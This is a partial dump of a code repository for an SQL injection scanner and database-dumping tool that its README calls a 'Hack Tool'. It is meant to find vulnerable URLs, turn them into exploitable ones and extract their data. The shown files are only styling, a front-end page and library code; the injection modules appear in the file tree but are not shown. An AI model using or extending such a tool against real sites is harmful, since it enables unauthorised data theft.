├── LICENSE
├── README.md
├── SCREEN SQLI SCANNER
    ├── analyse.PNG
    ├── dumper.PNG
    └── search.PNG
├── _config.yml
├── app
    ├── css
    │   ├── bootstrap-table.min.css
    │   ├── bootstrap.css
    │   ├── bootstrap.css.map
    │   ├── custom.css
    │   └── style.css
    ├── favicon.ico
    ├── fonts
    │   ├── glyphicons-halflings-regular.eot
    │   ├── glyphicons-halflings-regular.svg
    │   ├── glyphicons-halflings-regular.ttf
    │   ├── glyphicons-halflings-regular.woff
    │   └── glyphicons-halflings-regular.woff2
    ├── index.php
    ├── js
    │   ├── assets
    │   │   ├── angular-cookies.min.js
    │   │   ├── angular-route.min.js
    │   │   ├── angular-sanitize.min.js
    │   │   ├── angular-spinner.min.js
    │   │   ├── angular.min.js
    │   │   ├── app.js
    │   │   ├── bootstrap-table-angular.min.js
    │   │   ├── bootstrap-table-cookie.min.js
    │   │   ├── bootstrap-table-export.min.js
    │   │   ├── bootstrap-table-fr-FR.min.js
    │   │   ├── bootstrap-table-mobile.min.js
    │   │   ├── bootstrap-table.min.js
    │   │   ├── bootstrap.min.js
    │   │   ├── jquery.min.js
    │   │   ├── spin.min.js
    │   │   ├── tableExport.js
    │   │   └── treeview.js
    │   ├── controller
    │   │   ├── analyse.js
    │   │   ├── dumper.js
    │   │   ├── main.js
    │   │   └── recherche.js
    │   └── service
    │   │   ├── analyse.js
    │   │   ├── dumper.js
    │   │   ├── main.js
    │   │   └── recherche.js
    ├── main.php
    └── partials
    │   ├── analyse.html
    │   ├── dumper.html
    │   └── recherche.html
├── core
    ├── Controller.php
    ├── Dispatcher.php
    ├── Hook.php
    ├── Includer.php
    └── Session.php
├── index.md
└── request
    ├── SqlController.php
    ├── action.php
    ├── controller
        ├── AnalyseController.php
        ├── DumperController.php
        ├── HomeController.php
        └── RechercheController.php
    ├── scanneur_class.php
    └── sql
        ├── Chaine.php
        ├── Curl.php
        ├── Extracteur.php
        ├── Includer.php
        ├── Rechercheur.php
        ├── Scanneur.php
        └── sqli_class
            ├── sqli_colonne.php
            ├── sqli_dump.php
            └── sqli_inject.php


/README.md:
--------------------------------------------------------------------------------
 1 | # QuadCore-Web-SQLI-Dumper
 2 | WEB SQLi Injection and Dumper DATA Hack Tool
 3 | 
 4 | I am in no way responsible for the actions you do with this tool. 
 5 | Use this tool for prevention or security testing on your own domain.
 6 | 
 7 | # URLS SEARCHER
 8 | ![alt tag](https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLI-Dumper/master/SCREEN%20SQLI%20SCANNER/search.PNG)
 9 | # From Vulnerable to Exploitable URL
10 | ![alt tag](https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLI-Dumper/master/SCREEN%20SQLI%20SCANNER/analyse.PNG)
11 | # DUMPER DATA
12 | ![alt tag](https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLI-Dumper/master/SCREEN%20SQLI%20SCANNER/dumper.PNG)
13 | 
14 | 
15 | # By QuadCore ENgineering, MSB, QDMS
16 | 


--------------------------------------------------------------------------------
/SCREEN SQLI SCANNER/analyse.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLi-Injecter-DB-Dumper/d516c1a49daf9256457a887e41b0db06cd752470/SCREEN SQLI SCANNER/analyse.PNG


--------------------------------------------------------------------------------
/SCREEN SQLI SCANNER/dumper.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLi-Injecter-DB-Dumper/d516c1a49daf9256457a887e41b0db06cd752470/SCREEN SQLI SCANNER/dumper.PNG


--------------------------------------------------------------------------------
/SCREEN SQLI SCANNER/search.PNG:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLi-Injecter-DB-Dumper/d516c1a49daf9256457a887e41b0db06cd752470/SCREEN SQLI SCANNER/search.PNG


--------------------------------------------------------------------------------
/_config.yml:
--------------------------------------------------------------------------------
1 | theme: jekyll-theme-hacker


--------------------------------------------------------------------------------
/app/css/bootstrap-table.min.css:
--------------------------------------------------------------------------------
1 | .fixed-table-container .bs-checkbox,.fixed-table-container .no-records-found{text-align:center}.fixed-table-body thead th .th-inner,.table td,.table th{box-sizing:border-box}.bootstrap-table .table{margin-bottom:0!important;border-bottom:1px solid #ddd;border-collapse:collapse!important;border-radius:1px}.bootstrap-table .table:not(.table-condensed),.bootstrap-table .table:not(.table-condensed)>tbody>tr>td,.bootstrap-table .table:not(.table-condensed)>tbody>tr>th,.bootstrap-table .table:not(.table-condensed)>tfoot>tr>td,.bootstrap-table .table:not(.table-condensed)>tfoot>tr>th,.bootstrap-table .table:not(.table-condensed)>thead>tr>td{padding:8px}.bootstrap-table .table.table-no-bordered>tbody>tr>td,.bootstrap-table .table.table-no-bordered>thead>tr>th{border-right:2px solid transparent}.fixed-table-container{position:relative;clear:both;border:1px solid #ddd;border-radius:4px;-webkit-border-radius:4px;-moz-border-radius:4px}.fixed-table-container.table-no-bordered{border:1px solid transparent}.fixed-table-footer,.fixed-table-header{overflow:hidden}.fixed-table-footer{border-top:1px solid #ddd}.fixed-table-body{overflow-x:auto;overflow-y:auto;height:100%}.fixed-table-container table{width:100%}.fixed-table-container thead th{height:0;padding:0;margin:0;border-left:1px solid #ddd}.fixed-table-container thead th:focus{outline:transparent solid 0}.fixed-table-container thead th:first-child{border-left:none;border-top-left-radius:4px;-webkit-border-top-left-radius:4px;-moz-border-radius-topleft:4px}.fixed-table-container tbody td .th-inner,.fixed-table-container thead th .th-inner{padding:8px;line-height:24px;vertical-align:top;overflow:hidden;text-overflow:ellipsis;white-space:nowrap}.fixed-table-container thead th .sortable{cursor:pointer;background-position:right;background-repeat:no-repeat;padding-right:30px}.fixed-table-container thead th .both{background-image:url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAQAAADYWf5HAAAAkElEQVQoz7X QMQ5AQBCF4dWQSJxC5wwax1Cq1e7BAdxD5SL+Tq/QCM1oNiJidwox0355mXnG/DrEtIQ6azioNZQxI0ykPhTQIwhCR+BmBYtlK7kLJYwWCcJA9M4qdrZrd8pPjZWPtOqdRQy320YSV17OatFC4euts6z39GYMKRPCTKY9UnPQ6P+GtMRfGtPnBCiqhAeJPmkqAAAAAElFTkSuQmCC')}.fixed-table-container thead th .asc{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAAZ0lEQVQ4y2NgGLKgquEuFxBPAGI2ahhWCsS/gDibUoO0gPgxEP8H4ttArEyuQYxAPBdqEAxPBImTY5gjEL9DM+wTENuQahAvEO9DMwiGdwAxOymGJQLxTyD+jgWDxCMZRsEoGAVoAADeemwtPcZI2wAAAABJRU5ErkJggg==)}.fixed-table-container thead th .desc{background-image:url(data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABMAAAATCAYAAAByUDbMAAAAZUlEQVQ4y2NgGAWjYBSggaqGu5FA/BOIv2PBIPFEUgxjB+IdQPwfC94HxLykus4GiD+hGfQOiB3J8SojEE9EM2wuSJzcsFMG4ttQgx4DsRalkZENxL+AuJQaMcsGxBOAmGvopk8AVz1sLZgg0bsAAAAASUVORK5CYII=)}.fixed-table-container th.detail{width:30px}.fixed-table-container tbody td{border-left:1px solid #ddd}.fixed-table-container tbody tr:first-child td{border-top:none}.fixed-table-container tbody td:first-child{border-left:none}.fixed-table-container tbody .selected td{background-color:#f5f5f5}.fixed-table-container .bs-checkbox .th-inner{padding:8px 0}.fixed-table-container input[type=radio],.fixed-table-container input[type=checkbox]{margin:0 auto!important}.fixed-table-pagination .pagination-detail,.fixed-table-pagination div.pagination{margin-top:10px;margin-bottom:10px}.fixed-table-pagination div.pagination .pagination{margin:0}.fixed-table-pagination .pagination a{padding:6px 12px;line-height:1.428571429}.fixed-table-pagination .pagination-info{line-height:34px;margin-right:5px}.fixed-table-pagination .btn-group{position:relative;display:inline-block;vertical-align:middle}.fixed-table-pagination .dropup .dropdown-menu{margin-bottom:0}.fixed-table-pagination .page-list{display:inline-block}.fixed-table-toolbar .columns-left{margin-right:5px}.fixed-table-toolbar .columns-right{margin-left:5px}.fixed-table-toolbar .columns label{display:block;padding:3px 20px;clear:both;font-weight:400;line-height:1.428571429}.fixed-table-toolbar .bars,.fixed-table-toolbar .columns,.fixed-table-toolbar .search{position:relative;margin-top:10px;margin-bottom:10px;line-height:34px}.fixed-table-pagination li.disabled a{pointer-events:none;cursor:default}.fixed-table-loading{display:none;position:absolute;top:42px;right:0;bottom:0;left:0;z-index:99;background-color:#fff;text-align:center}.fixed-table-body .card-view .title{font-weight:700;display:inline-block;min-width:30%;text-align:left!important}.table td,.table th{vertical-align:middle}.fixed-table-toolbar .dropdown-menu{text-align:left;max-height:300px;overflow:auto}.fixed-table-toolbar .btn-group>.btn-group{display:inline-block;margin-left:-1px!important}.fixed-table-toolbar .btn-group>.btn-group>.btn{border-radius:0}.fixed-table-toolbar .btn-group>.btn-group:first-child>.btn{border-top-left-radius:4px;border-bottom-left-radius:4px}.fixed-table-toolbar .btn-group>.btn-group:last-child>.btn{border-top-right-radius:4px;border-bottom-right-radius:4px}.bootstrap-table .table>thead>tr>th{vertical-align:bottom;border-bottom:1px solid #ddd}.bootstrap-table .table thead>tr>th{padding:0;margin:0}.bootstrap-table .fixed-table-footer tbody>tr>td{padding:0!important}.bootstrap-table .fixed-table-footer .table{border-bottom:none;border-radius:0;padding:0!important}.pull-right .dropdown-menu{right:0;left:auto}p.fixed-table-scroll-inner{width:100%;height:200px}div.fixed-table-scroll-outer{top:0;left:0;visibility:hidden;width:200px;height:150px;overflow:hidden}


--------------------------------------------------------------------------------
/app/css/custom.css:
--------------------------------------------------------------------------------
  1 | /*
  2 |  QUADCORE ENGINEERING MSB
  3 | */
  4 | /*==============================================
  5 |     GENERAL  STYLES
  6 |     =============================================*/
  7 | body {
  8 |     font-family: 'Open Sans', sans-serif;
  9 | }
 10 | 
 11 |  #wrapper {
 12 |     width: 100%;
 13 |     background:#202020;
 14 | }
 15 | 
 16 | #page-wrapper {
 17 |     padding: 15px 15px;
 18 |     min-height: 600px;
 19 |     background:#F3F3F3;
 20 | 
 21 | }
 22 | #page-inner {
 23 |     width:100%;
 24 |     margin:10px 20px 10px 0px;
 25 |     background-color:#fff!important;
 26 |     padding:10px;
 27 |     min-height:1200px;
 28 | }
 29 | 
 30 | .text-center {
 31 |     text-align:center;
 32 | }
 33 | .no-boder {
 34 |     border:1px solid #f3f3f3;
 35 | }
 36 | h2 {
 37 |     color: #f00;
 38 | }
 39 | h4 {
 40 |     padding-top:10px;
 41 | }
 42 | .square-btn-adjust {
 43 |     border: 0px solid transparent;
 44 |    -webkit-border-radius: 0px;
 45 | -moz-border-radius: 0px;
 46 | border-radius: 0px;
 47 | 
 48 | }
 49 | p {
 50 |     font-size:16px;
 51 |     line-height:25px;
 52 |     padding-top:20px;
 53 | }
 54 | /*==============================================
 55 |    DASHBOARD STYLES
 56 |     =============================================*/
 57 | .panel-back {
 58 |     background-color:#F8F8F8;
 59 | 
 60 | }
 61 |    .noti-box {
 62 | min-height: 100px;
 63 | padding: 20px;
 64 | }
 65 | 
 66 |     .noti-box .icon-box {
 67 | display: block;
 68 | float: left;
 69 | margin: 0 15px 10px 0;
 70 | width: 70px;
 71 | height: 70px;
 72 | line-height: 75px;
 73 | vertical-align: middle;
 74 | text-align: center;
 75 | font-size: 40px;
 76 | }
 77 | .text-box p{
 78 |     margin: 0 0 3px;
 79 | }
 80 | .main-text {
 81 |     font-size: 25px;
 82 |     font-weight:600;
 83 | }
 84 | .set-icon {
 85 |     -webkit-border-radius: 50px;
 86 | -moz-border-radius: 50px;
 87 | border-radius: 50px;
 88 | 
 89 | }
 90 |     .bg-color-green {
 91 | background-color: #00CE6F;
 92 | color: #fff;
 93 | }
 94 |  .bg-color-blue {
 95 | background-color: #A95DF0;
 96 | color: #fff;
 97 | }
 98 |   .bg-color-red {
 99 | background-color: #DB0630;
100 | color: #fff;
101 | }
102 |   .bg-color-brown {
103 | background-color: #B94A00;
104 | color: #fff;
105 | }
106 | 
107 | 
108 |  .icon-box-right {
109 | display: block;
110 | float: right;
111 | margin: 0 15px 10px 0;
112 | width: 70px;
113 | height: 70px;
114 | line-height: 75px;
115 | vertical-align: middle;
116 | text-align: center;
117 | font-size: 40px;
118 | }
119 | 
120 |  .main-temp-back {
121 | background: #8702A8;
122 | color: #FFFFFF;
123 | font-size: 16px;
124 | font-weight: 300;
125 | text-align: center;
126 | }
127 |  .main-temp-back .text-temp {
128 | font-size: 40px;
129 | }
130 | .back-dash {
131 |     padding:20px;
132 |     font-size:20px;
133 |     font-weight:500;
134 |       -webkit-border-radius: 0px;
135 | -moz-border-radius: 0px;
136 | border-radius: 0px;
137 | background-color:#2EA7EB;
138 | color:#fff;
139 | }
140 |     .back-dash p {
141 |         padding-top:16px;
142 |         font-size:13px;
143 |         color:#fff;
144 |         line-height:25px;
145 |         text-align:justify;
146 |     }
147 |     .back-footer-green {
148 |     background-color: #009B50;
149 |     border-top: 0px solid #fff;
150 | }
151 |      .back-footer-red {
152 |     background-color: #AF0000;
153 |     border-top: 0px solid #fff;
154 | }
155 |      .color-bottom-txt {
156 |    color: #000;
157 | font-size: 16px;
158 | line-height: 30px;
159 | }
160 |      /*CHAT PANEL*/
161 |  .chat-panel .panel-body {
162 | height: 450px;
163 | overflow-y: scroll;
164 | }
165 |  .chat-box {
166 | margin: 0;
167 | padding: 0;
168 | list-style: none;
169 | }
170 |  .chat-box li {
171 | margin-bottom: 15px;
172 | padding-bottom: 5px;
173 | border-bottom: 1px dotted #808080;
174 | }
175 |  .chat-box li.left .chat-body {
176 | margin-left: 90px;
177 | }
178 |  .chat-box li .chat-body p {
179 | margin: 0;
180 | color: #8d8888;
181 | }
182 | .chat-img>img {
183 |     margin-left:20px;
184 | }
185 | 
186 | /*==============================================
187 |     MENU STYLES
188 |     =============================================*/
189 | 
190 | 
191 | .user-image {
192 |     margin: 25px auto;
193 |     -webkit-border-radius: 10px;
194 |     -moz-border-radius: 10px;
195 |     border-radius: 10px;
196 |     max-height:170px;
197 |     max-width:170px;
198 | }
199 | 
200 | .navbar-cls-top .navbar-brand {
201 | 	color: #fff;
202 |     background: #1449B2;
203 |     width: 260px;
204 |     text-align: center;
205 |     height: 50px;
206 |     font-size: 30px;
207 |     font-weight: 700;
208 | }
209 | .active-menu {
210 |     background-color:#1449B2!important;
211 | }
212 | 
213 | .arrow {
214 |     float: right;
215 | }
216 | 
217 | .fa.arrow:before {
218 |     content: "\f104";
219 | }
220 | 
221 | .active > a > .fa.arrow:before {
222 |     content: "\f107";
223 | }
224 | 
225 | 
226 | .nav-second-level li,
227 | .nav-third-level li {
228 |     border-bottom: none !important;
229 | }
230 | 
231 | .nav-second-level li a {
232 |     padding-left: 37px;
233 | }
234 | 
235 | .nav-third-level li a {
236 |     padding-left: 55px;
237 | }
238 | .sidebar-collapse , .sidebar-collapse .nav{
239 | 	background:none;
240 | }
241 | .sidebar-collapse .nav {
242 | 	padding:0;
243 | }
244 | .sidebar-collapse .nav > li > a {
245 | 	color:#fff;
246 | 	background:#202020;
247 | 	text-shadow:none;
248 | 
249 | }
250 | .sidebar-collapse > .nav > li > a {
251 | 	padding:15px 10px;
252 | }
253 | .sidebar-collapse > .nav > li {
254 | 	border-bottom: 1px solid rgba(107, 108, 109, 0.19);
255 | }
256 | .sidebar-collapse .nav > li > a:hover,
257 | .sidebar-collapse .nav > li > a:focus {
258 | 
259 | 	background:#0A0A0A;
260 | 	outline:0;
261 | }
262 | 
263 | .nav-second-level > li > a:before ,
264 | .nav-third-level > li > a:before {
265 | 	content:"";
266 | 	display:block;
267 | 	position:absolute;
268 | 	left:20px;
269 | 	width:15px;
270 | 	height:1px;
271 | 	background:#ff0000;
272 | 	top:20px;
273 | }
274 | .nav-second-level > li > a:after,
275 | .nav-third-level > li > a:after {
276 | 	content:"";
277 | 	display:block;
278 | 	position:absolute;
279 | 	left:20px;
280 | 	width:1px;
281 | 	height:100%;
282 | 	background:#ff0000;
283 | 	top:0px;
284 | 	z-index:10;
285 | }
286 | .nav-second-level  > li:last-child > a:after,
287 | .nav-third-level  > li:last-child > a:after {
288 | 	height:50%;
289 | }
290 | .nav-third-level > li > a:after,
291 | .nav-third-level > li > a:before  {
292 | 	left:40px;
293 | }
294 | .navbar-side {
295 | 	border:none;
296 | 	background-color: #202020;
297 | 
298 | }
299 | .navbar-cls-top {
300 | 	background:#4D4D4D;
301 | 	border-bottom:none;
302 | 
303 | }
304 | .navbar-cls-top .navbar-brand:hover {
305 | 
306 | background: #1449B2;
307 | color:#fff;
308 | 
309 | }
310 | 
311 | .navbar-default {
312 | border:0px solid black;
313 | 
314 | }
315 | .navbar-header {
316 |     background: #A70303;
317 | }
318 | .navbar-default .navbar-toggle:hover, .navbar-default .navbar-toggle:focus {
319 | background-color: #B40101;
320 | }
321 | .navbar-default .navbar-toggle {
322 | border-color: #fff;
323 | }
324 | 
325 | .navbar-default .navbar-toggle .icon-bar {
326 | background-color: #FFF;
327 | }
328 | .nav > li > a > i {
329 |     margin-right:10px;
330 | }
331 | /*==============================================
332 |     UI ELEMENTS STYLES
333 |     =============================================*/
334 | .btn-circle {
335 | width: 50px;
336 | height: 50px;
337 | padding: 6px 0;
338 |  -webkit-border-radius: 25px;
339 | -moz-border-radius: 25px;
340 | border-radius: 25px;
341 | text-align: center;
342 | font-size: 12px;
343 | line-height: 1.428571429;
344 | }
345 | 
346 | /*==============================================
347 |     MEDIA QUERIES
348 |     =============================================*/
349 | 
350 |  @media(min-width:768px) {
351 |      #page-wrapper{
352 |         margin: 0 0 0 260px;
353 |         padding: 15px 30px;
354 |         min-height: 1200px;
355 | 
356 |     }
357 | 
358 |     .navbar-side {
359 |         z-index: 1;
360 |         position: absolute;
361 |         width: 260px;
362 |     }
363 | 
364 |    .navbar {
365 |         border-radius: 0px;
366 |     }
367 | 
368 | }
369 | 


--------------------------------------------------------------------------------
/app/css/style.css:
--------------------------------------------------------------------------------
  1 | /*
  2 |  QUADCORE ENGINEERING MSB
  3 | */
  4 | h1 {
  5 |     margin-top: 0;
  6 |     float: left;
  7 | }
  8 | #controls {
  9 |     float: left;
 10 |     padding: 0.3em 1em;
 11 | }
 12 | table.scrollTable {
 13 |     width: 100%;
 14 |     border: 1px solid #ddd;
 15 | }
 16 | thead {
 17 |     background-color: #eee;
 18 | }
 19 | thead th {
 20 |     text-align: center;
 21 |     padding: 0.1em 0.3em;
 22 | }
 23 | tbody td {
 24 |     border-top: 1px solid #eee;
 25 |     border-right: 1px solid #eee;
 26 |     padding: 0.1em 0.3em;
 27 | }
 28 | tbody tr.odd td {
 29 |     background-color: #f9f9f9;
 30 | }
 31 | .btn-file {
 32 |     position: relative;
 33 |     overflow: hidden;
 34 | }
 35 | .btn-file input[type=file] {
 36 |     position: absolute;
 37 |     top: 0;
 38 |     right: 0;
 39 |     min-width: 100%;
 40 |     min-height: 100%;
 41 |     font-size: 100px;
 42 |     text-align: right;
 43 |     filter: alpha(opacity=0);
 44 |     opacity: 0;
 45 |     outline: none;
 46 |     background: white;
 47 |     cursor: inherit;
 48 |     display: block;
 49 | }
 50 | 
 51 | .spinner {
 52 |   width: 100px;
 53 | }
 54 | .spinner input {
 55 |   text-align: right;
 56 | }
 57 | .input-group-btn-vertical {
 58 |   position: relative;
 59 |   white-space: nowrap;
 60 |   width: 1%;
 61 |   vertical-align: middle;
 62 |   display: table-cell;
 63 | }
 64 | .input-group-btn-vertical > .btn {
 65 |   display: block;
 66 |   float: none;
 67 |   width: 100%;
 68 |   max-width: 100%;
 69 |   padding: 8px;
 70 |   margin-left: -1px;
 71 |   position: relative;
 72 |   border-radius: 0;
 73 | }
 74 | .input-group-btn-vertical > .btn:first-child {
 75 |   border-top-right-radius: 4px;
 76 | }
 77 | .input-group-btn-vertical > .btn:last-child {
 78 |   margin-top: -2px;
 79 |   border-bottom-right-radius: 4px;
 80 | }
 81 | .input-group-btn-vertical i{
 82 |   position: absolute;
 83 |   top: 0;
 84 |   left: 4px;
 85 | }
 86 | #statut_strip {
 87 |  position: fixed;
 88 |  bottom: 0;
 89 |  width: 100%;
 90 |  height: 30px;
 91 |  background: #0078DD;
 92 | }
 93 | 
 94 | /* TreeView */
 95 | ul.checktree-root, ul#tree ul {
 96 |   list-style: none;
 97 | }
 98 | ul.checktree-root label {
 99 |   font-weight: bold;
100 |   position: relative;
101 | }
102 | ul.checktree-root label input {
103 |   position: relative;
104 |   top: 2px;
105 |   left: -5px;
106 | }
107 | 
108 | ul.checktree-root label:hover {
109 |   background-color: #f5f5f5;
110 |   color: #33799B;
111 |   font-weight: bold;
112 |   padding-left: 0;
113 | }
114 | /* /.. TreeView */
115 | 
116 | @media only screen and (max-width: 768px) {
117 |   #col_maximize{
118 |       width: 100%;
119 |   }
120 | }
121 | 
122 | .spacer {
123 |   margin-top: 20px;
124 | }
125 | 


--------------------------------------------------------------------------------
/app/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLi-Injecter-DB-Dumper/d516c1a49daf9256457a887e41b0db06cd752470/app/favicon.ico


--------------------------------------------------------------------------------
/app/fonts/glyphicons-halflings-regular.eot:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLi-Injecter-DB-Dumper/d516c1a49daf9256457a887e41b0db06cd752470/app/fonts/glyphicons-halflings-regular.eot


--------------------------------------------------------------------------------
/app/fonts/glyphicons-halflings-regular.ttf:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLi-Injecter-DB-Dumper/d516c1a49daf9256457a887e41b0db06cd752470/app/fonts/glyphicons-halflings-regular.ttf


--------------------------------------------------------------------------------
/app/fonts/glyphicons-halflings-regular.woff:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLi-Injecter-DB-Dumper/d516c1a49daf9256457a887e41b0db06cd752470/app/fonts/glyphicons-halflings-regular.woff


--------------------------------------------------------------------------------
/app/fonts/glyphicons-halflings-regular.woff2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/quadcoreside/QuadCore-Web-SQLi-Injecter-DB-Dumper/d516c1a49daf9256457a887e41b0db06cd752470/app/fonts/glyphicons-halflings-regular.woff2


--------------------------------------------------------------------------------
/app/index.php:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html lang="fr">
 3 | <head>
 4 | 	<meta charset="utf-8" />
 5 | 	<meta name="viewport" content="width=device-width, initial-scale=1.0" />
 6 | 	<link rel="icon" href="favicon.ico" />
 7 | 	<title>SQLi SCANNER - by QuadCore Engineering MSB</title>
 8 | 	<link href="css/bootstrap.css" rel="stylesheet" />
 9 | 	<link href="css/bootstrap-table.min.css" rel="stylesheet" />
10 | 	<link href="css/custom.css" rel="stylesheet" />
11 | 	<link href="css/style.css" rel="stylesheet" />
12 | 	<script src="js/assets/jquery.min.js"></script>
13 | 	<script src="js/assets/bootstrap.min.js"></script>
14 | 	<script src="js/assets/treeview.js"></script>
15 | 	<script src="js/assets/angular.min.js"></script>
16 | 	<script src="js/assets/angular-route.min.js"></script>
17 | 	<script src="js/assets/angular-cookies.min.js"></script>
18 | 	<script src="js/assets/spin.min.js"></script>
19 | 	<script src="js/assets/angular-spinner.min.js"></script>
20 | 	<script src="js/assets/bootstrap-table.min.js"></script>
21 | 	<script src="js/assets/bootstrap-table-angular.min.js"></script>
22 | 	<script src="js/assets/tableExport.js"></script>
23 | 	<script src="js/assets/bootstrap-table-export.min.js"></script>
24 | 	<script src="js/assets/bootstrap-table-cookie.min.js"></script>
25 | 	<script src="js/assets/bootstrap-table-mobile.min.js"></script>
26 | 	<script src="js/assets/app.js"></script>
27 | 	<script src="js/service/main.js"></script>
28 | 	<script src="js/controller/main.js"></script>
29 | 	<script src="js/service/recherche.js"></script>
30 | 	<script src="js/controller/recherche.js"></script>
31 | 	<script src="js/service/analyse.js"></script>
32 | 	<script src="js/controller/analyse.js"></script>
33 | 	<script src="js/service/dumper.js"></script>
34 | 	<script src="js/controller/dumper.js"></script>
35 | </head>
36 | <body ng-app="SqliAppOne">
37 | 
38 | 	<div id="wrapper">
39 | 		<nav class="navbar navbar-default navbar-cls-top " role="navigation" style="margin-bottom: 0">
40 | 			<div class="navbar-header">
41 | 				<a class="navbar-brand">SQLi SCANNER</a>
42 | 			</div>
43 | 			<div style="color: white; padding: 15px 50px 5px 50px; float: right; font-size: 16px;"> QuadCore Engineering <em>bêta</em> 2017  &copy;</div>
44 | 		</nav>
45 | 	</div>
46 | 
47 | 	<div ng-controller="MainController">
48 | 
49 | 	    <div class="container-fluid">
50 | 
51 | 				<div style="margin-top: 10px;">
52 | 			        <ul class="nav nav-pills">
53 | 			            <li ng-repeat="tab in tabs" ng-class="{ active: tab == dossierCourant }"><a ng-click="selectionDossier(tab)" href="#{{tab.value}}">{{tab.label}}</a></li>
54 | 			        </ul>
55 | 				</div>
56 | 
57 | 			<span us-spinner spinner-key="spinner-1"></span>
58 | 
59 | 	        <div ng-view=""></div>
60 | 
61 | 	    </div>
62 | 
63 | 	</div>
64 | </body>
65 | </html>
66 | 


--------------------------------------------------------------------------------
/app/js/assets/angular-cookies.min.js:
--------------------------------------------------------------------------------
1 | /*
2 |  AngularJS v1.5.1-build.4662+sha.7ecfa5d
3 |  (c) 2010-2016 Google, Inc. http://angularjs.org
4 |  License: MIT
5 | */
6 | (function(p,c,n){'use strict';function l(b,a,g){var d=g.baseHref(),k=b[0];return function(b,e,f){var g,h;f=f||{};h=f.expires;g=c.isDefined(f.path)?f.path:d;c.isUndefined(e)&&(h="Thu, 01 Jan 1970 00:00:00 GMT",e="");c.isString(h)&&(h=new Date(h));e=encodeURIComponent(b)+"="+encodeURIComponent(e);e=e+(g?";path="+g:"")+(f.domain?";domain="+f.domain:"");e+=h?";expires="+h.toUTCString():"";e+=f.secure?";secure":"";f=e.length+1;4096<f&&a.warn("Cookie '"+b+"' possibly not set or overflowed because it was too large ("+
7 | f+" > 4096 bytes)!");k.cookie=e}}c.module("ngCookies",["ng"]).provider("$cookies",[function(){var b=this.defaults={};this.$get=["$$cookieReader","$$cookieWriter",function(a,g){return{get:function(d){return a()[d]},getObject:function(d){return(d=this.get(d))?c.fromJson(d):d},getAll:function(){return a()},put:function(d,a,m){g(d,a,m?c.extend({},b,m):b)},putObject:function(d,b,a){this.put(d,c.toJson(b),a)},remove:function(a,k){g(a,n,k?c.extend({},b,k):b)}}}]}]);c.module("ngCookies").factory("$cookieStore",
8 | ["$cookies",function(b){return{get:function(a){return b.getObject(a)},put:function(a,c){b.putObject(a,c)},remove:function(a){b.remove(a)}}}]);l.$inject=["$document","$log","$browser"];c.module("ngCookies").provider("$$cookieWriter",function(){this.$get=l})})(window,window.angular);
9 | 


--------------------------------------------------------------------------------
/app/js/assets/angular-route.min.js:
--------------------------------------------------------------------------------
 1 | /*
 2 |  AngularJS v1.5.1-build.4662+sha.7ecfa5d
 3 |  (c) 2010-2016 Google, Inc. http://angularjs.org
 4 |  License: MIT
 5 | */
 6 | (function(r,d,C){'use strict';function x(s,h,g){return{restrict:"ECA",terminal:!0,priority:400,transclude:"element",link:function(a,c,b,f,y){function k(){n&&(g.cancel(n),n=null);l&&(l.$destroy(),l=null);m&&(n=g.leave(m),n.then(function(){n=null}),m=null)}function z(){var b=s.current&&s.current.locals;if(d.isDefined(b&&b.$template)){var b=a.$new(),f=s.current;m=y(b,function(b){g.enter(b,null,m||c).then(function(){!d.isDefined(u)||u&&!a.$eval(u)||h()});k()});l=f.scope=b;l.$emit("$viewContentLoaded");
 7 | l.$eval(v)}else k()}var l,m,n,u=b.autoscroll,v=b.onload||"";a.$on("$routeChangeSuccess",z);z()}}}function A(d,h,g){return{restrict:"ECA",priority:-400,link:function(a,c){var b=g.current,f=b.locals;c.html(f.$template);var y=d(c.contents());if(b.controller){f.$scope=a;var k=h(b.controller,f);b.controllerAs&&(a[b.controllerAs]=k);c.data("$ngControllerController",k);c.children().data("$ngControllerController",k)}a[b.resolveAs||"$resolve"]=f;y(a)}}}r=d.module("ngRoute",["ng"]).provider("$route",function(){function s(a,
 8 | c){return d.extend(Object.create(a),c)}function h(a,d){var b=d.caseInsensitiveMatch,f={originalPath:a,regexp:a},g=f.keys=[];a=a.replace(/([().])/g,"\\$1").replace(/(\/)?:(\w+)(\*\?|[\?\*])?/g,function(a,d,b,c){a="?"===c||"*?"===c?"?":null;c="*"===c||"*?"===c?"*":null;g.push({name:b,optional:!!a});d=d||"";return""+(a?"":d)+"(?:"+(a?d:"")+(c&&"(.+?)"||"([^/]+)")+(a||"")+")"+(a||"")}).replace(/([\/$\*])/g,"\\$1");f.regexp=new RegExp("^"+a+"$",b?"i":"");return f}var g={};this.when=function(a,c){var b=
 9 | d.copy(c);d.isUndefined(b.reloadOnSearch)&&(b.reloadOnSearch=!0);d.isUndefined(b.caseInsensitiveMatch)&&(b.caseInsensitiveMatch=this.caseInsensitiveMatch);g[a]=d.extend(b,a&&h(a,b));if(a){var f="/"==a[a.length-1]?a.substr(0,a.length-1):a+"/";g[f]=d.extend({redirectTo:a},h(f,b))}return this};this.caseInsensitiveMatch=!1;this.otherwise=function(a){"string"===typeof a&&(a={redirectTo:a});this.when(null,a);return this};this.$get=["$rootScope","$location","$routeParams","$q","$injector","$templateRequest",
